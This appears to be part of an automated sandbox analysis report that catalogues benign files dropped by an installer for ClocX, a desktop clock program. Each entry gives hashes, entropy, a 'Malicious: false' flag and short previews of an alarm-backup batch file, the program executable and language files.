Preview:	SQLite format 3......@ .......k...Q.............................................................-...............................z..!1...-i.n.d.e.x.N.P.1._.I.D.X._.1.N.P.1..C.R.E.A.T.E. .U.N.I.Q.U.E. .I.N.D.E.X. .N.P.1._.I.D.X._.1. .O.N. .N.P.1.(.N.D.).. ..!.....t.a.b.l.e.N.P.1.N.P.1..C.R.E.A.T.E. .T.A.B.L.E. .N.P.1.(.N.D. .s.q.l.i.t.e.3._.i.n.t.6.4.,. .N.M.D. .B.L.O.B.,. .S.H.A. .B.L.O.B.,. .T.S. .I.N.T.E.G.E.R.,. .D.T. .I.N.T.E.G.E.R.,. .F.G. .I.N.T.E.G.E.R.,. .F.D. .C.H.A.R.,. .M.W. .C.H.A.R.,. .S.C. .C.H.A.R.,. .V.R. .I.N.T.E.G.E.R.).r..!-...%i.n.d.e.x.F.L._.I.D.X._.1.F.L..C.R.E.A.T.E. .U.N.I.Q.U.E. .I.N.D.E.X. .F.L._.I.D.X._.1. .O.N. .F.L.(.F.N.)..$..!....!t.a.b.l.e.F.L.F.L..C.R.E.A.T.E. .T.A.B.L.E. .F.L.(.F.N. .s.q.l.i.t.e.3._.i.n.t.6.4.,. .A.C. .I.N.T.E.G.E.R.,. .F.G. .I.N.T.E.G.E.R.,. .V.R. .I.N.T.E.G.E.R.)..B..!....]t.a.b.l.e.V.I.V.I..C.R.E.A.T.E. .T.A.B.L.E. .V.I.(.C.V. .C.H.A.R.,. .O.V. .C.H.A.R.,. .U.V. .C.H.A.R.,. .P.V. .C.H.A.R.,. .T.V. .C.H.A.R.,. .C.T. .I.N.T.E.G.E.R.,.

C:\Program Files (x86)\ClocX\BackupAlarms.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.795593782140805
Encrypted:	false
SSDEEP:	3:8hFgEYiXukHqp2YR3snjo1q5hXIWn:8h23iXzj83GU1qYW
MD5:	C8BF8F5A39C3CD41974F240DE82A0E75
SHA1:	F37B3319D1349DDBC34A3229FFE5F567E845C058
SHA-256:	CC51C20EF9133B8B13F5DDC0464679B81677413CF34A5B70785ABFEF857367B5
SHA-512:	0896EF062C1A738DFECF0C40220304C02C602169AFC7F8CBB99E8943AF6D46033441D8DA8D1237D62ABD0EDBD92F400BE0685B8CC09A9A26C91FD5554C78A0FB
Malicious:	false
Reputation:	unknown
Preview:	regedit /ea alarms.reg HKEY_CURRENT_USER\Software\BonSoft\ClocX\Alarms

C:\Program Files (x86)\ClocX\ClocX.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2090496
Entropy (8bit):	6.160592837778405
Encrypted:	false
SSDEEP:	49152:g6vznGwXRuYl294VVamxwoWVXOSLsJelqJ1cya/caqYY3MSV2Uu:bpXRu594VVajoSXOSLielqJulc1YY3Ms
MD5:	2943A5A31664A8183E993D480B8709BC
SHA1:	E7C28C1692073CF3769B61A8B298D09497D2A635
SHA-256:	282397F5EFC6B5A517881350736901620649C3CF0A692423CF77B9093F933E8B
SHA-512:	F6DFA47D02DC9D1D874B5618C354961EA70E7C5223C27EFEB530DBCEAD610AA8255DFEEFE3A68325DB9B00AC9DF6A5519C885F91ECB82E582BBFA34364CD3518
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..h{..h{..h{...{..h{...{..h{...{..h{..i{..h{.^.{..h{.^.{..h{.^.{D.h{.^.{..h{.^.{..h{.^.{..h{Rich..h{........................PE..L....(.P.................\..........A........p....@........................... .....+l ...@.................................T...T....................................................................i..@............p...............................text...wZ.......\.................. ..`.rdata..(....p.......`..............@..@.data............p..................@....rsrc................f..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Lang\Afrikaans.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2284
Entropy (8bit):	5.180986000943191
Encrypted:	false
SSDEEP:	48:YcosbKhFY9+dx0nCQIjGZfZfUnteSos+go5XboJ1oqcBI9zwqbkl9oKRvpgdTv:Gnx0n2jUqeRd5XsPNZbadvmdTv
MD5:	7F8D637F9AB63DC4120C6439B19710DA
SHA1:	38460CDD6C2EBB49FA2E49C6397AAFF369697351
SHA-256:	2F7AC68D51C52C33D8186123BD0B7F8A2087EC5E5B3C5BD16FD844AA220774FB
SHA-512:	1A881116A6CAFC1291E8B71E2FAAE1F350C2459EB38C989286F33495F93A516917D5CA614B69AEB9C46CA7B208B884D12A97B6201B320A3D1A213B59CAC89F3F
Malicious:	false
Reputation:	unknown
Preview:	001,Kan nie die beeld laai nie!..002,Kan nie die tydgewer instel nie!..003,Algemeen..004,Voorkoms..005,Aktief..006,Fout met die byvoeging van die Alpha-Kanaal!..007,Kan nie die uurwyser laai nie!..008,Kan nie die minuutwyser laai nie!..009,Kan nie die sekondewyser laai nie!..010,vm..011,nm..012,ClocX - Wekker SINK!..013,Kan nie die agtergrond laai nie!..014, Deurskyning (Win2k/XP)..015, Prioriteit..016,Laag..017,Normaal..018,Hoog..019, Sagte tekening..020,Onaktief (vinnig)..021,Metode 1 (standaard)..022,Metode 2 (stadiger)..023, Beeldkeuses..024,Altyd bo..025,Heg aan werkskerm (Win2k/XP)..026,Deurklikbaar (Win2k/XP)..027,Onbeweeglik..028,Posisie deur werkskerm beperk..029, Standaardkeuses..030,Wys vm/nm..031,Minuutliks..032, Agtergrond..033, Begin..034,Begin met Windows..035,Begin met aanteken (gebruiker)..036,Behou vorige posisie..037,Keuses..038,OK..039,Kanselleer..040,OK..041,Nuwe .....042,Redigeer .....043,Los..044,Toets..045,Sorterr wekkers volgens tyd..046,Naam..047,Tyd..048,Datu

C:\Program Files (x86)\ClocX\Lang\Arabic.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2134
Entropy (8bit):	5.6344245676996625
Encrypted:	false
SSDEEP:	48:sf8rC2JvLPvHQbQbQ3ktvMpVf5+rwx0w5GcgAuPCnXTu:i2JPvCQbEYrelgT6XTu
MD5:	B0277FB1E01F2C417AC128A7E683B81B
SHA1:	4265377B929A15D510A6DC07E2C3986751D984C7
SHA-256:	6F8806A904F7ADED9C217C8A7FA5F38F13CE0BB5F5A21E0CCB74612C9C9B3EB5
SHA-512:	1E3C1001AA92E97932AF9C6B0A28F535A707EA2C7D01A6E333BC95E7CFF71A04A81B6F89EE8D112667C21502D7E591F1D0942C513B82D64638D664E444D590CF
Malicious:	false
Reputation:	unknown
Preview:	001, .. ...... ..... ........002, .. ...... ..... .......!..003,General..004,Appearance..005,Enabled..006, ... .. ..... .... .... !..007, ... .. ..... .... ...... !..008, ... .. ..... .... ....... !..009, ... .. ..... .... .......!..010, ...011, ...012, ClocX - ..... ... .......!..013, .. ...... ...... .......!..014, (2K/XP)..........015, ........016, .......017, ... .......018, .......019, .... .........020, (.... (......021, (..... 1 (.........022, (..... 2 (......023, ...... .......024, ..... .. ........025, (2K/XP)...... ... ... ........026, (2K/XP)..... ......027, ..... .......028, ..... ...... ... ........029, ......... ............030, ... ./...031,Minutely !!!..032, .......033, .....034, ... .. .........035, (... .. ..... ....... (..........036, ...... ...... .... .........037, ........038, .......039, .......040, .......041, ......042, .......043, .....044, ........045, ..... ........ ... .......046, .....047, .....048, .......049, %d. ... .. .....050, .......051, ........052

C:\Program Files (x86)\ClocX\Lang\Bosanski.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2360
Entropy (8bit):	5.340070352554395
Encrypted:	false
SSDEEP:	48:OeeySYKHbJVvLmhXm6NPL+Y4EGidNoiqiEUygVMg+a3kGjkIa2RFmk4SaTv:OeeySFbJhLm86NPL+1bwSPU50a37BVI7
MD5:	4DAD1A9BFCB103D54B06909ABB097536
SHA1:	B4D125726C841FDBE717BE04FB22843C2FDEE837
SHA-256:	79DBBB2DE47A367B70646DCCB4AF1DFCD56A9ADCD4959D82612CF6889B1D8CF7
SHA-512:	E2C8F121440D8259191C2932AF7FA5978065AA295726150C0E27B0F569686CC46009939EBAC303A97BA76507B9AB94B56587F712B4332D8620692EF11552F2BB
Malicious:	false
Reputation:	unknown
Preview:	001,Ne mogu da u.itam sliku..002,Ne mogu da inicijaliziram tajmer!..003,Op.ta pode.avanja..004,Izgled..005,Omogu.eno..006,Gre.ka pri dodavanju alfa kanala!..007,Ne mogu da u.itam kazaljku za sate!..008,Ne mogu da u.itam kazaljku za minute!..009,Ne mogu da u.itam kazaljku za sekunde!..010,AM..011,PM..012,ClocX - alarm ISKLJU.IVANJE!..013,Ne mogu da u.itam pozadinu!..014, Providnost (Win2k/XP) ..015, Prioritet ..016,Nizak..017,Normalan..018,Visok..019, Umek.avanje..020,Isklju.eno (fast)..021,Metoda 1 (default)..022,Metoda 2 (sporije)..023, Opcije prozora ..024,Uvijek na vrhu..025,Zaka.en za Desktop (Win2k/XP)..026,Klik kroz (Win2k/XP)..027,Nepokretan prozor..028,Ograni.i poziciju veli.inom ekrana..029, Preset opcije ..030,Prika.i AM/PM..031,Minutno..032, Pozadina ..033, Startup ..034,Pokreni sa Windows-om..035,Pokreni pri login-u (user)..036,Ne vra.aj prozor na po.etnu poziciju..037,Opcije..038,&U redu..039,&Otka.i..040,&Zatvori..041,&Novi.....042,&Izmijeni.....043,&Obri.i..044,&Test..04

C:\Program Files (x86)\ClocX\Lang\Brazilian Portuguese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2299
Entropy (8bit):	5.287961916315013
Encrypted:	false
SSDEEP:	48:9DLSULlHyDf339z4wakpkxNOp0EIPY5drDQvXcBkK/h2nb3M:9D+ESz3NzNkzadrDQNkao
MD5:	663CA37CB27AA3B419C76F228889B08C
SHA1:	875E600FFEA6E925D35011F5A44CA5E9FECD1140
SHA-256:	CFE734403030DD1A5BDEA2F307FB3416C2DC424AF6C298A127A2CD13900BDE67
SHA-512:	EDA069DA7998919A39409A61ADF01B544FC222CAF490F985507B849A8442DCC62A3F744C026484B5E4450081815B1031A099BEB62EE75BAFC7D5A5C2682A397C
Malicious:	false
Reputation:	unknown
Preview:	001,Imagem n.o carregada.002,Temporizador n.o iniciado!.003,Geral.004,Apar.ncia.005,Habilitado.006,Erro no canal alfa!.007,O ponteiro das horas n.o foi carregado!.008,O ponteiro dos minutos n.o foi carregado!.009,O ponteiro dos segundos n.o foi carregado!.010,AM.011,PM.012,ClocX - ENCERRAR o alarme!.013,O fundo n.o foi carregado!.014,Transpar.ncia (Win2k/XP) .015, Prioridade .016,Baixa.017,Normal.018,Alta.019,Contorno suave .020,Desativado (r.pido).021,M.todo 1 (padr.o).022,M.todo 2 (lento).023, Op..es de janelas .024,Sempre em primeiro plano.025,Colar ao Desktop (Win2k/XP).026,Clique atrav.s (Win2k/XP).027,Fixo.028,Posi..o limitada pela tela.029,Op..es do rel.gio .030,Mostrar AM/PM.031,Minuciosamente.032,Fundo .033,Inicializa..o .034,Inicializar com o Windows.035,Inicializar com login (Usu.rio).036,N.o ajustar pos. (monitor-duplo).037,Op..es.038,&OK.039,&Cancelar.040,&Fechar.041,&Novo....042,&Editar....043,&Apagar.044,&Testar.045,Alarmes organizados por tempo.046,Nome.047,Hora.048,Dat

C:\Program Files (x86)\ClocX\Lang\Bulgarian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2341
Entropy (8bit):	5.674982113835398
Encrypted:	false
SSDEEP:	48:Q4D1txCI+Pyna/m9PDbSRiVXwCZhYRag3YRikKYuPCnXTu:NLxWTsPDbS8GCFY81KL6XTu
MD5:	FC5EFBE2A513ACFC40B7276BA1D9E7FD
SHA1:	68879191DC99CBE8F1D0DE298AA2EA9DD2126017
SHA-256:	4DB314221B4C98E7D8E5849D7502BB2926E2A7CD4B340EA127E3351C9FE38F57
SHA-512:	B15EC36EEEA8A5B76BBF5D98F644558A0E0A0602F7F3EF391E043061F45BF37E35A7C046AAAE75C48530B5BF2A16F3CC63113782467B6506E29DD4C86437D2F8
Malicious:	false
Reputation:	unknown
Preview:	001,.. .... .. ...... .........!..002,.. .... .. ............ .......!..003,......004,........005,............006,...... ... ........ .. .... .....!..007,.. .... .. ...... ........ .......!..008,.. .... .. ...... ......... .......!..009,.. .... .. ...... .......... .......!..010,AM..011,PM..012,ClocX - .......... .. ........!..013,.. .... .. ...... ...!..014, ........... (Win2k/XP)..015, ...........016,.......017,..........018,.......019, ............020,............ (.....)..021,..... 1 (..........)..022,..... 2 (.....)..023, ..... .. ...........024,...... ........025,....... ... ........ (WinXP)..026,...... .... (Win2./XP)..027,.......... ..........028,........ ......... . ........029, .......... .......030,........ AM/PM..031,.... "X" ........032, .....033, ............034,......... . Windows..035,......... ... ..... .. ............036,.. ............ ...........037,.......038,&OK..039,&........040,&OK..041,&.........042,&..............043,&...........044,&..........045,........ ...

C:\Program Files (x86)\ClocX\Lang\Czech.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2317
Entropy (8bit):	5.569844746682866
Encrypted:	false
SSDEEP:	48:hInwTWyJOTni5/QS90WmUBC3MRq6mgmcvL5uJBUTLoAc9ceGK6mq6vs5:htTWyJOTi54oecg/cT0XAjY6AG
MD5:	A1A459AEBED25C19F29A65E4BA95649C
SHA1:	D9C7E65249563CC9523305E9D56F8BD6AC10B6E1
SHA-256:	A3BFBCEF85E8317089B62B98265B052949F3B11D0B404526B51AA489C14E5649
SHA-512:	E32F2A29DDD2E69F80F091BD081C6CFC5AADE9B7113FD8BA1A18E670FA8A4222238231EF97987B3240CEF205F5F57B22F3CC3B701AAE8D1BDDE8943CAA383352
Malicious:	false
Reputation:	unknown
Preview:	001,Nelze na..st soubor!..002,Nelze inicializovat Timer!..003,Obecn...004,Vzhled ..005,Zapnout..006,Chyba v p.ipojen. alfa kan.lu!..007,Nelze na..st hodinovou PNG ru.i.ku!..008,Nelze na..st minutovou PNG ru.i.ku!..009,Nelze na..st sekundovou PNG ru.i.ku!..010,AM..011,PM..012,ClocX - bud.k vyp.n. po..ta.!..013,Nelze na..st pozad.!..014, Pr.hlednost (Win2k/XP) ..015, Priorita ..016,N.zk...017,St.edn...018,Vysok...019, Vyhlazov.n. hran ..020,Vypnuto (rychlej..)..021,Metoda 1 (v.choz.)..022,Metoda 2 (pomalej..)..023, Nastaven. okna ..024,V.dy na vrchu..025,V.dy vespod (Win2k/XP)..026,Proklik.vac. (Win2k/XP)..027,Nep.esunuteln...028,Zak.zat posunut. mimo obraz..029, Mo.nosti pozad. ..030,Zobrazit AM/PM..031,Minutov...032, Styl ..033, Spu.t.n. ..034,Spustit p.i startu Windows..035,Spustit po p.ihl.en. u.ivatele..036,Neupravovat pozici (dual-monitor)..037,Mo.nosti..038,&OK..039,&Zru.it..040,&Zav..t..041,&Nov......042,&Zm.nit.....043,&Smazat..044,&Test..045,Bud.ky (t..d.n. podle .asu)..046,N.

C:\Program Files (x86)\ClocX\Lang\Danish.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2249
Entropy (8bit):	5.355862754705078
Encrypted:	false
SSDEEP:	48:NBTNJZ209IBMoFnjw18YvIPRg85a5QXyKUjFkkaTu:NNNJZ20GBLJw8YvEx0apUjFk5Tu
MD5:	1793FD4614D665E1B0FA41CBFE09C531
SHA1:	360CCBA52499F0B7498DC5E3E87C22F901994AB4
SHA-256:	E2C426880EAFB1B032B70678965628795C5655AB3C97A1F5404DABEC3DD1FF52
SHA-512:	AC446E3EC77A1CD037B270C3FF85E58316EC7624A47AF873BF5B9FA53A5C277EC4675A80A288678F2CB839A30071DF8EEB1BD098A848270450E9E0D7968368BF
Malicious:	false
Reputation:	unknown
Preview:	001,Kan ikke hente foto!..002,Kan ikke starte timer!..003,Alment..004,Udsende..005,&Aktivere..006,Fejl ved till.g af alfakanal!..007,Kan ikke loade timeviseren!..008,Kan ikke loade minutviseren!..009,Kan ikke loade sekundviseren!..010,FM..011,AM..012,ClocX - Lyd lukket..013,Kan ikke hente baggrunden!..014, Gennemsigthed (Win2k/XP) ..015, Prioritet ..016,Lav..017,Normal..018,H.j..019, Kantudj.vning ..020,&Inaktiverad (Hurtig)..021,Metode &1 (standard)..022,Metode &2 (Langsomt)..023, Alternativ for vindue ..024,Altid &.verst..025,&Fast p. Skrivbordet (Win2k/XP)..026,&Klik i gennem (Win2k/XP)..027,&Ej flytbart vindue..028,&Begr.nset position til sk.rmen..029, .vrigt ..030,Vis &PM/AM..031,hvert minut..032, Baggrund ..033, Start ..034,&Start samtidigt med Windows..035,S&tart ved login (Anvend)..036,&.ndre ikke pos. (To Sk.rme)..037,Alternativ..038,OK..039,Afbryd..040,&Luk..041,&Nyt.....042,&Redigere.....043,Ta &v.k..044,&Test..045,Alarm sorteret efter tid..046,Navn..047,Tid..048,Dato..049,%

C:\Program Files (x86)\ClocX\Lang\Deutsch.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	5.335592870780523
Encrypted:	false
SSDEEP:	48:ZfBd7wrhvl0k/Bz2XAxq9J4SCVbYaeuHQyVSXh2F0bzvxFWIEuJsZFXlVUMjL7YX:/wxJz2wxqQFb3NSFWIzUXoMzY1Z
MD5:	B4DB92C415B94A3F270B3B4A06D2A446
SHA1:	0413F4D52D6174D0C3C5E792EB2C7BE08E907D02
SHA-256:	33B1ECFA6DC605FCB6C7DBEBF1792AC93AB1F8C7C2FC98DFF10AF4C97553EE9F
SHA-512:	4274A4372006E75042BD9B87E3D8C1F7F9852757FB46459FFAB1E9F4193D3B3103CD49A281507BD76D5548DE22F9B2420568582D32C871A5B952157DAB9F946E
Malicious:	false
Reputation:	unknown
Preview:	001,Kann Bild nicht laden!..002,Kann Zeitgeber nicht initialisieren!..003,Allgemein..004,Aussehen..005,aktiv..006,Fehler beim hinzuf.gen des Alpha-Kanals!..007,Kann Stunden-Zeiger nicht laden!..008,Kann Minuten-Zeiger nicht laden!..009,Kann Sekunden-Zeiger nicht laden!..010,AM..011,PM..012,ClocX - Alarm HERUNTERFAHREN!..013,Kann Hintergrund nicht laden!..014, Transparenz (Win2k/XP)..015, Priorit.t..016,Niedrig..017,Normal..018,Hoch..019, Weichzeichnen..020,Deaktiviert (schnell)..021,Methode 1 (standard)..022,Methode 2 (langsamer)..023, Fenster-Optionen..024,Immer oben..025,An Desktop heften (Win2k/XP)..026,Hindurchklickbar (Win2k/XP)..027,Unbewegliches Fenster..028,Position durch Desktop begrenzen..029, Standard-Optionen..030,Zeige AM/PM..031,Min.tlich..032, Hintergrund..033, Starten..034,Mit Windows starten..035,Mit Login starten (Benutzer)..036,Fenster nicht neu positionieren..037,Optionen..038,&OK..039,&Abbrechen..040,&OK..041,&Neu.....042,&Bearbeiten.....043,&L.schen..044,&Testen..

C:\Program Files (x86)\ClocX\Lang\English.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2195
Entropy (8bit):	5.322992609048549
Encrypted:	false
SSDEEP:	48:S9910MsOKxTvsoVeOFLvxCBkin0Dqtbry4whkLA8wFfHYwgAuPRXTv:S9xkFsoXZg0DqtbG4whknwFf4wgTNTv
MD5:	E873D0C2ECD4DCCE5E89191FFDE5253A
SHA1:	04D6C989C41D8E2895B94E1D41882C3F76EF9C0E
SHA-256:	E913E546B84C80F5F2D4B4CF85D72BF1F722AABD7B9C5C97814F828966077296
SHA-512:	A3914AFA462A14721F223EB16E9903709D504C5F77094D6CFA92D07513FD1726616C925E43DCF14E81120161316751D1BDA7DDD0F82936C8A1E8B8F169DC2047
Malicious:	false
Reputation:	unknown
Preview:	001,Cannot load image..002,Cannot initialize timer!..003,General..004,Appearance..005,&Enabled..006,Error adding alpha channel!..007,Can't load hour hand!..008,Can't load minute hand!..009,Can't load second hand!..010,AM..011,PM..012,ClocX - alarm SHUTDOWN!..013,Could not load background!..014, &Transparency (Win2000+) ..015, Priorit&y ..016,Low..017,Normal..018,High..019, Antialiasing ..020,Disa&bled (fast)..021,Method &1 (default)..022,Method &2..023, Window options ..024,&Always on top..025,&Pin to Desktop (Win2000+)..026,Clic&k through (Win2000+)..027,&Unmovable window..028,&Limit position by screen size..029, Style options ..030,Show &AM/PM..031,Minutely..032, &Style ..033, Startup ..034,Run ClocX with &Windows (admin)..035,&Run ClocX at user logon..036,Don't ad&just pos. (dual-monitor)..037,Options..038,&OK..039,&Cancel..040,&Close..041,&New.....042,&Edit.....043,&Delete..044,&Test..045,Alarms sorted by time..046,Name..047,Time..048,Date..049,%d. day in month..050,Daily..051,Week

C:\Program Files (x86)\ClocX\Lang\Espanol.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2505
Entropy (8bit):	5.147183891313604
Encrypted:	false
SSDEEP:	48:+SPTJ2eRlB17zb6X3vbc+Texw1Kr/CaA8HvrSdU2VGgcQwha4a6/3V8vcv:+4l2eXT7PY3zc+xMyEvP2shQwUsVl
MD5:	EA82EE5D70868307FB93CA810CAE4613
SHA1:	5F41C9092E8D9FC09AC8143C1DD2994903800D86
SHA-256:	8285C04903A1F1AA4451F0AB81401B88A9FFAF720952B703C708B7363F420EAF
SHA-512:	3D8931B2E543B302C479FD356E8692780D88945FD7E69405060441C5AA77AA54830F8A4FDCBB5C7B6CED3F759800517B2C864E97A53AC31B31434D8AC27B8826
Malicious:	false
Reputation:	unknown
Preview:	001,No se puede cargar la imagen.002,.No se puede inicializar el temporizador!.003,General.004,Apariencia.005,Activar.006,.Error al a.adir m.scara de transparencias!.007,.No se puede cargar la aguja de las horas!.008,.No se puede cargar la aguja de los minutos!.009,.No se puede cargar la aguja de los segundos!.010,AM.011,PM.012,.ClocX - APAGADO (alarma)!.013,.No se puede cargar el fondo!.014, Transparencia (Win2k/XP) .015, Prioridad .016,Baja.017,Normal.018,Alta.019, Difuminado de contornos .020,Deshabilitado (r.pido).021,M.todo 1 (por defecto).022,M.todo 2 (lento).023, Opciones de ventana .024,Siempre en primer plano.025,Pegado al escritorio (Win2k/XP).026,Clic a trav.s (Win2k/XP).027,Ventana fija.028,Ventana limitada por la pantalla.029, Opciones Reloj .030,Visualizar AM/PM.031,Minuciosamente.032, Imagen .033, Arranque .034,Empezar con Windows.035,Empezar al login de usuario.036,No ajustar posici.n (2 monitores).037,Opciones.038,&Aceptar.039,&Cancelar.040,&Cerrar.041,&Nuevo....042,&E

C:\Program Files (x86)\ClocX\Lang\Estonian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	5.182401934744877
Encrypted:	false
SSDEEP:	48:HrWjaA54MqKpFKlZx2MPq45Gm38OWuyHVCJ20Qv+bC/gloIGMINTu:hAaH6qH2MPqD48un4p+bUizBuTu
MD5:	84C4D2361103B662BEBF68DA906D4F40
SHA1:	0AA776C9CF78F45212F953A274C4F6C703016AB0
SHA-256:	6CF612F8E25A26A8FE2DD498DF727C4AACCEA47BD2ED871EDCCDD5C074B99167
SHA-512:	8AC021C5CB9281314474FF1DAEF3EF6C2A4262D3744837E46B02ECE9095A4C1798ACE858200AF3E40BB905E1C22BD4AABB0EBA96CA578B2155BFC50A6321E87C
Malicious:	false
Reputation:	unknown
Preview:	001,Ei saa pilti avada!..002,Ei saa kella avada!..003,.ldine..004,V.limus..005,Lubatud..006,Viga alfa kanali lisamisel!..007,Ei saa avada tunni osutit!..008,Ei saa avada minuti osutit!..009,Ei saa avada sekundi osutit..010,AM..011,PM..012,meeldetuletuse sulgemine!..013,Ei saa tausta lisada!..014,L.bipaistvus (Win2k/XP) ..015,Prioriteet ..016,Madal..017,Normaalne..018,K.rge..019, Silumine ..020,&Keelatud (kiire)..021,Meetod &1 (vaikimisi)..022,Meetod &2..023, Akna s.tted ..024,&Alati pealmine..025,&T..lauale(Win2k/XP)..026,&Kl.ps kuni (Win2k/XP)..027,&Liikumatu aken..028,&Ekraanil piiratud positsioon..029, Ettem..ratud valikud ..030,N.ita &AM/PM..031,Minimaalselt..032, &Taust ..033, K.ivita ..034,K.ivita koos &Windowsiga..035,&K.ivita koos logimisega (kasutajaga)..036,.ra lisa& positsiooni. (dual-monitoril)..037,Valikud..038,&OK..039,&Katkesta..040,&Sulge..041,&Uus.....042,&Redigeeri.....043,&Kustuta..044,&Testi..045,Meeldetuletused ajaliselt sorteeritud..046,Nimi..047,Aeg..048,Kuup.ev.

C:\Program Files (x86)\ClocX\Lang\French.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2372
Entropy (8bit):	5.250285063754293
Encrypted:	false
SSDEEP:	48:vJFRS8/MlfWqeawdkKPnwShTJAnMZ/ekJOFGD6l243LqicRy:RFs8UxWqeanSTJAnXkJOv7qicg
MD5:	7767FBCDA3DB9B77F1E8FEB02172AE34
SHA1:	2E7FC2B22E094061AB51FC805CF16863E601A512
SHA-256:	4FFE5D4BF560C15DB2777F0BC31652D7C733DC3CAD3B4E052B10BBD6AF65A0EC
SHA-512:	A0C0A6D155ECFBABEC6DDE343E17536C550393DD7900B9A233549A61609F0F248FE9BC94B136B1A3695D9AACB1F63E1C5A6B3ABBE20526A26FEFBE5DB433918F
Malicious:	false
Reputation:	unknown
Preview:	001,Ne peut charger l'image.002,Ne peut intialiser l'horloge!.003,G.n.ral.004,Apparence.005,&Disponible.006,Erreur d'ajout de canaux alpha!.007,Ne peut charger l'aiguille des heures!.008,Ne peut charger l'aiguille des minutes!.009,Ne peut charger l'aiguille des secondes!.010,AM.011,PM.012,ClocX - alarme ARRET!.013,Ne peut charger l'image de fond!.014, &Transparence (Win2k/XP) .015, P&riorit. .016,Basse.017,Normale.018,Haute.019, Anticr.nelage .020,D.sacti&v. (rapide).021,M.thode &1 (par d.faut).022,M.thode &2 (lente).023, Options de windows .024,Tou&jours au dessus.025,Fi&x.e au bureau (Win2k/XP).026,&Clic . travers (Win2k/XP).027,Fen&.tre bloqu.e.028,Position &limit.e par l'.cran.029, Options par d.fauts.030,Voir &AM/PM.031,Minutieusement.032, &Image de fond .033, D.marrage .034,D.marrer avec &Windows.035,D.marra&ge avec login (utilisateur).036,Ne pas repositi&onner (2 .crans).037,Options.038,&OK.039,Annul&er.040,&Fermer.041,&Nouveau....042,&.diter....043,&Effacer.044,&Tester.045,Alar

C:\Program Files (x86)\ClocX\Lang\Greek.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2481
Entropy (8bit):	5.748505003046585
Encrypted:	false
SSDEEP:	48:fQQV08HDWRNNxzWfwVDmC7yrdxKInE/nzjsGUM+GGAEIHVGVqYNmZ7+5a1PTu:ruNdwwVyPBxhnE/zYGh+GVpGVBei5a9C
MD5:	9CA688F0E5F418AB6D24DF39CCD336D2
SHA1:	EE45BC8EEFFAD60D1F7F54A9894137CAB160BCEA
SHA-256:	887EE063F618D73F46B7ED49C6A36AE0A117CB060A6AF0986A5E31B7270B9D92
SHA-512:	91153AE38246B27F745C6D12D74603E6B11AD2B28FFCB83E0E7E3582EA864E905631125DF7926B88A97456B5CA04A1E2AF1088D5F329946AAEDB3532417DAB3F
Malicious:	false
Reputation:	unknown
Preview:	001,.. ...... .. ........ . ........002,........ .. ............ . ...!..003,........004,..........005,&........006,... ...... .. ........ .. alpha channel!..007,... ...... .. ........ . ........... ..........!..008,... ...... .. ........ . ........... ............!..009,... ...... .. ........ . ........... ...................!..010,....011,....012,......... ClocX .........013,... ...... .. ........ .. backround!..014,&......... (Win2k/XP) ..015,&............ ..016,........017,..........018,.......019,Antialiasing..020,&.............. (.......)..021,&....... 1(..........)..022,&....... 2 (... ....)..023,........ ......... ..024,&..... ... ...........025,&.......... (Win2k/XP)..026,&.... ....... (Win2k/XP)..027,&.............028,&........... ... .... ........029,.............030,&..../......031,... .......032,&Backround..033,...... ..034,&...... .. .. windows..035,&...... .. password (.......)..036,.. ....... ....(..... .......)..037,..........038,&OK..039,&.........040,&..........041,&

C:\Program Files (x86)\ClocX\Lang\Hebrew.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2013
Entropy (8bit):	5.5733608573558495
Encrypted:	false
SSDEEP:	48:A+UFyubnHRyCv8TzCVoL29Vg9mAsMeoXLyh+y/5WnRzuPCnXTu:nubHpUPAoL2VgLsMeoXLT+5Wno6XTu
MD5:	E312627E571323C7805473D7C8A6B3E5
SHA1:	EB9ECA27CDEBD2984B3B4FCE6279731EC7C40EF3
SHA-256:	808986BA3FFBD5B0BEFE6C8CF4DFD5578D138B5569ADF7DC1C41D32F37542D81
SHA-512:	114B44D29C1AF4772CEFCD14213A3D3679995BD6E2C121D403CB36675A4043177D1B9128864229C451A8C8FA8032FE365E0B5139700DFA7DFC1194A718675929
Malicious:	false
Reputation:	unknown
